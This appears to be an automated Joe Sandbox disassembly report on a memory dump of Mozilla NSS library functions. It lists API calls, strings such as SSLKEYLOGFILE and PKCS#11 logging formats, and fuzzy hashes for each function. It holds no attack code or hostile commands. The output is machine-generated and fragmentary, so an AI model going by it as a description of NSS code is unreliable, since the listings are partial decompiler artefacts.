PR_Unlock.NSS3(?), ref: 6C6E4F01
free.MOZGLUE(00000000), ref: 6C6E4F2A

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 1a66776b2f29d70bfba2b58d6ed6c29bb8aaafdc2bb670a99b895016d4414274
Instruction ID: 166530e53d5f73956caf38d7b55f97581796dda0ea546b20a279d06021fc0fc9
Opcode Fuzzy Hash: 1a66776b2f29d70bfba2b58d6ed6c29bb8aaafdc2bb670a99b895016d4414274
Instruction Fuzzy Hash: 4BB14075A052059FDB00EFB8D888BAA77B4BF49318F04412AED1597B01EB70E925CBD5

Function 6C736E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C736BF7), ref: 6C736EB6

Part of subcall function 6C691240: TlsGetValue.KERNEL32(00000040,?,6C69116C,NSPR_LOG_MODULES), ref: 6C691267
Part of subcall function 6C691240: EnterCriticalSection.KERNEL32(?,?,?,6C69116C,NSPR_LOG_MODULES), ref: 6C69127C
Part of subcall function 6C691240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C69116C,NSPR_LOG_MODULES), ref: 6C691291
Part of subcall function 6C691240: PR_Unlock.NSS3(?,?,?,?,6C69116C,NSPR_LOG_MODULES), ref: 6C6912A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C7DFC0A,6C736BF7), ref: 6C736ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C736EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C736EFC
PR_NewLock.NSS3 ref: 6C736F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C736F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C736BF7), ref: 6C736F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C736BF7), ref: 6C736F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C736BF7), ref: 6C736FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C736BF7), ref: 6C736FFD

Strings

# SSL/TLS secrets log file, generated by NSS, xrefs: 6C736EF7
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C736FF8
SSLKEYLOGFILE, xrefs: 6C736EB1
SSLFORCELOCKS, xrefs: 6C736F2B
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C736FDB
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C736F4F

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: a22adaaf8dd3b03fe42b9079d26268e3d467435415551259899ff1a9802820b0
Instruction ID: d42d140f2ae5ab04fb10d54d3fadaccc8b84803f2711bcb6113bb910d9b90522
Opcode Fuzzy Hash: a22adaaf8dd3b03fe42b9079d26268e3d467435415551259899ff1a9802820b0
Instruction Fuzzy Hash: A2A148B2B568E1C6E7205A3CCF0174432A2BB9732EF585378E838CBED6DB359540C291

Function 6C70E8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6C70E853,?,FFFFFFFF,?,?,6C70B0CC,?,6C70B4A0,?,00000000), ref: 6C70E8D9

Part of subcall function 6C700D30: calloc.MOZGLUE ref: 6C700D50
Part of subcall function 6C700D30: TlsGetValue.KERNEL32 ref: 6C700D6D

Part of subcall function 6C70C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C70DAE2,?), ref: 6C70C6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6C70E972
PORT_ArenaMark_Util.NSS3(?), ref: 6C70E9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C70EA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C70EA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C70EA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C70EA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C70EA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C70EACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C70EB56
PK11_FreeSymKey.NSS3(00000000), ref: 6C70EBC2
SECOID_FindOID_Util.NSS3(?), ref: 6C70EBEC
free.MOZGLUE(00000000), ref: 6C70EC58

Strings

Spl, xrefs: 6C70E9CA, 6C70EAAB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: Spl
API String ID: 759478663-1928391934
Opcode ID: fd1f5c24b18a59209239c277efaf64d703b26e08c305fcc2e5f6a628e69cc45d
Instruction ID: 574c11805b366c92874d0beb2219fd4458183f90e987cc286afe89a326a27c5c
Opcode Fuzzy Hash: fd1f5c24b18a59209239c277efaf64d703b26e08c305fcc2e5f6a628e69cc45d
Instruction Fuzzy Hash: F9C17DF1B012099BEB00CF69DA85BAA77F4BF09318F140079E956A7B51E731E844CBE5

Function 6C6D4E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C6D4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D4EC7

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6D4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C6D4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C6D4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C6D4F68

Strings

n{l, xrefs: 6C6D4F82, 6C6D4FB2
C_GetAttributeValue, xrefs: 6C6D4E7E
pTemplate = 0x%p, xrefs: 6C6D4F4A
hObject = 0x%x, xrefs: 6C6D4EF5, 6C6D4F05
hSession = 0x%x, xrefs: 6C6D4EA2, 6C6D4EB2
(CK_INVALID_HANDLE), xrefs: 6C6D4EC0, 6C6D4F13
ulCount = %d, xrefs: 6C6D4F63

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$n{l
API String ID: 1003633598-2956856034
Opcode ID: b11e6475b6e694bd84d776c701006a6544a5ebdd59b8997390c44863e17a276f
Instruction ID: 12854baf6f2ec1a646a777dc60b0d43286bb3ceb484579b7023590e0a38b4a95
Opcode Fuzzy Hash: b11e6475b6e694bd84d776c701006a6544a5ebdd59b8997390c44863e17a276f
Instruction Fuzzy Hash: 5E418271701145AFDB109F54DE8CFAA7BB5EB8231DF054038E90467612D774BE48CBAA

Function 6C6D4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C6D4CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D4D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D4D37

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D4D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6D4D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D4D8A
PR_LogPrint.NSS3(?,00000000), ref: 6C6D4DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C6D4DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C6D4E20

Strings

n{l, xrefs: 6C6D4DD4, 6C6D4DFF
pulSize = 0x%p, xrefs: 6C6D4DB7
*pulSize = 0x%x, xrefs: 6C6D4E1B
hObject = 0x%x, xrefs: 6C6D4D65, 6C6D4D75
C_GetObjectSize, xrefs: 6C6D4CEE
hSession = 0x%x, xrefs: 6C6D4D12, 6C6D4D22
(CK_INVALID_HANDLE), xrefs: 6C6D4D30, 6C6D4D83

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$n{l
API String ID: 1003633598-2774214123
Opcode ID: 7b642aa89fa53abc917dd20c9f5f9367c5645459d5b9bdfb2475646de77e198f
Instruction ID: 906ff61ca0f768ad0abdd61b7bbf5d9933ff5aeed4ef6041ef8e5b90a38ccf8e
Opcode Fuzzy Hash: 7b642aa89fa53abc917dd20c9f5f9367c5645459d5b9bdfb2475646de77e198f
Instruction Fuzzy Hash: 10419271701105AFD7109F54DE8CB6A3BB5EB4631EF054038F9086B612DB74BD48CA9A

Function 6C6D2F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SetPIN), ref: 6C6D2F26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D2F54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D2F63

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D2F79
PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C6D2F9A
PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C6D2FB5
PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C6D2FCE
PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C6D2FE7

Strings

n{l, xrefs: 6C6D2FFF, 6C6D3030
ulOldLen = %d, xrefs: 6C6D2FB0
pOldPin = 0x%p, xrefs: 6C6D2F95
C_SetPIN, xrefs: 6C6D2F21
ulNewLen = %d, xrefs: 6C6D2FE2
hSession = 0x%x, xrefs: 6C6D2F3E, 6C6D2F4E
pNewPin = 0x%p, xrefs: 6C6D2FC9
(CK_INVALID_HANDLE), xrefs: 6C6D2F5C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$n{l
API String ID: 1003633598-1476459332
Opcode ID: 504e4627eb88d504616830f9fc71ed6f95b51cd56583cb07095cb16c11306914
Instruction ID: 0e38e928daf2c11faf2614c8cd119c4a41b84f27a3c9b0a02d757a1acb4819e7
Opcode Fuzzy Hash: 504e4627eb88d504616830f9fc71ed6f95b51cd56583cb07095cb16c11306914
Instruction Fuzzy Hash: CF31C275B01145AFDB109F54DE4CE8A3BB1EF4631DF0A4538E808A7612DB34F948CBAA

Function 6C7328C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6C735B40: PR_GetIdentitiesLayer.NSS3 ref: 6C735B56

TlsGetValue.KERNEL32 ref: 6C73290A
EnterCriticalSection.KERNEL32(00000001), ref: 6C73291E
TlsGetValue.KERNEL32 ref: 6C732937
EnterCriticalSection.KERNEL32(00000001), ref: 6C73294B
PR_EnterMonitor.NSS3(?), ref: 6C732966
PR_EnterMonitor.NSS3(?), ref: 6C7329AC
PR_ExitMonitor.NSS3(?), ref: 6C7329D1
PR_EnterMonitor.NSS3(?), ref: 6C7329F0
PR_EnterMonitor.NSS3(?), ref: 6C732A15
PR_EnterMonitor.NSS3(?), ref: 6C732A37
PR_ExitMonitor.NSS3(?), ref: 6C732A61
PR_ExitMonitor.NSS3(?), ref: 6C732A78
PR_ExitMonitor.NSS3(?), ref: 6C732A8F
PR_ExitMonitor.NSS3(?), ref: 6C732AA6

Part of subcall function 6C769440: TlsGetValue.KERNEL32 ref: 6C76945B
Part of subcall function 6C769440: TlsGetValue.KERNEL32 ref: 6C769479
Part of subcall function 6C769440: EnterCriticalSection.KERNEL32 ref: 6C769495
Part of subcall function 6C769440: TlsGetValue.KERNEL32 ref: 6C7694E4
Part of subcall function 6C769440: TlsGetValue.KERNEL32 ref: 6C769532
Part of subcall function 6C769440: LeaveCriticalSection.KERNEL32 ref: 6C76955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C732AF9
free.MOZGLUE(?), ref: 6C732B16
PR_Unlock.NSS3(?), ref: 6C732B6D
PR_Unlock.NSS3(?), ref: 6C732B80

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: 3308c3bfcb35f1d7e2349a574bcec14345a57755488f7b00048c734bc23b8c2c
Instruction ID: 8622cb4e172d18bbc4449271741f4ec3ce8eeb54ad6fc5332fd055bab6ebcbff
Opcode Fuzzy Hash: 3308c3bfcb35f1d7e2349a574bcec14345a57755488f7b00048c734bc23b8c2c
Instruction Fuzzy Hash: A081B1B5A007015BE7209F35ED49B97B7E5AF15318F045838E89EC6B13EB35E518CB82

Function 6C6F8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C6F8E01,00000000,6C6F9060,6C800B64), ref: 6C6F8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C6F8E01,00000000,6C6F9060,6C800B64), ref: 6C6F8E9E
PORT_ArenaAlloc_Util.NSS3(6C800B64,00000001,?,?,?,?,6C6F8E01,00000000,6C6F9060,6C800B64), ref: 6C6F8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C6F8E01,00000000,6C6F9060,6C800B64), ref: 6C6F8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C6F8E01,00000000,6C6F9060,6C800B64), ref: 6C6F8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C6F8E01,00000000,6C6F9060,6C800B64), ref: 6C6F8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C6F8E01), ref: 6C6F8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C800B64,6C800B64), ref: 6C6F8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C6F8F3F

Part of subcall function 6C6FA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C6FA421,00000000,00000000,6C6F9826), ref: 6C6FA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6F904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C6F8E76

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: 1c2719790bc3e0fb270de838230db40afaefc2d09d1059e0d2c0d8e5c4bd1978
Instruction ID: cd981263714f09b6ae0b295436d7c6c1f95f21597131f494c238e09a74010605
Opcode Fuzzy Hash: 1c2719790bc3e0fb270de838230db40afaefc2d09d1059e0d2c0d8e5c4bd1978
Instruction Fuzzy Hash: 9A61B6B5D011099FDB10CF65CD44AAFB7B6FF89358F144168DC28A7710E732A916CBA4

Function 6C6A8E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A8E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C6A8E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6A8EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C7D18D0,?), ref: 6C6A8F03
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C6A8F19
PL_FreeArenaPool.NSS3(?), ref: 6C6A8F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6A8F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6A8F65
PL_FinishArenaPool.NSS3(?), ref: 6C6A8FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C6A8FFE
PR_CallOnce.NSS3(6C802AA4,6C7012D0), ref: 6C6A9012
PL_FreeArenaPool.NSS3(?), ref: 6C6A9024
PL_FinishArenaPool.NSS3(?), ref: 6C6A902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C6A903E

Strings

security, xrefs: 6C6A8EE7

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: c31196f03c3c923c22cc82dfe6c7c4bdfec5ab4b6ea6789176e9d60a947aae4b
Instruction ID: 539308679fb20e4c5b47de284bf766de335bafe998985aaa29df9b00b3f102de
Opcode Fuzzy Hash: c31196f03c3c923c22cc82dfe6c7c4bdfec5ab4b6ea6789176e9d60a947aae4b
Instruction Fuzzy Hash: 05517BB1608340ABD7109A949D49FEB73E8AB8939CF04082EF85497B50D731DD0AC75B

Function 6C76CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C76CC7B), ref: 6C76CD7A

Part of subcall function 6C76CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C6DC1A8,?), ref: 6C76CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C76CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C76CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C76CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C76CD8E

Part of subcall function 6C6905C0: PR_EnterMonitor.NSS3 ref: 6C6905D1
Part of subcall function 6C6905C0: PR_ExitMonitor.NSS3 ref: 6C6905EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C76CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C76CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C76CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C76CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C76CE48

Strings

getaddrinfo, xrefs: 6C76CD88, 6C76CDF9
wship6.dll, xrefs: 6C76CDE3
getnameinfo, xrefs: 6C76CDB2, 6C76CE23
ws2_32.dll, xrefs: 6C76CD75
freeaddrinfo, xrefs: 6C76CD9F, 6C76CE10

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: ef60e958857678af165ba4fa33f2165f3d7fe3e954a31fa60800ff05bb20d766
Instruction ID: ecd0d7d65655ff3625b8717274b6667f9f37a8823511516c4b0422182f86426a
Opcode Fuzzy Hash: ef60e958857678af165ba4fa33f2165f3d7fe3e954a31fa60800ff05bb20d766
Instruction Fuzzy Hash: B611E9B5F0212217EF1166776E0199E39EC5B0325EF180538DC15D6F01FB20EA48C3EA

Function 6C710C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(*,ql), ref: 6C710C81

Part of subcall function 6C6FBE30: SECOID_FindOID_Util.NSS3(6C6B311B,00000000,?,6C6B311B,?), ref: 6C6FBE44

Part of subcall function 6C6E8500: SECOID_GetAlgorithmTag_Util.NSS3(6C6E95DC,00000000,00000000,00000000,?,6C6E95DC,00000000,00000000,?,6C6C7F4A,00000000,?,00000000,00000000), ref: 6C6E8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C710CC4

Part of subcall function 6C6FFAB0: free.MOZGLUE(?,-00000001,?,?,6C69F673,00000000,00000000), ref: 6C6FFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C710CD5
